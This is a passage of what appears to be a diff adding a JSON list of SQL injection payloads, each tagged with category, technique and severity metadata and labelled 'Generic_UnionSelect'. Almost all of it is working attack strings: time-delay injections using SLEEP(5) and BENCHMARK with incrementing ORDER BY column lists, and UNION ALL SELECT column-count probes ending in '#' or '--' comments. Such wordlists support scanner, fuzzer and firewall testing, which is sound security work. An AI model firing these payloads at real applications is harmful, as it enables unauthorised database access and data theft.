"generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5)--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),3--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),3,4--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + 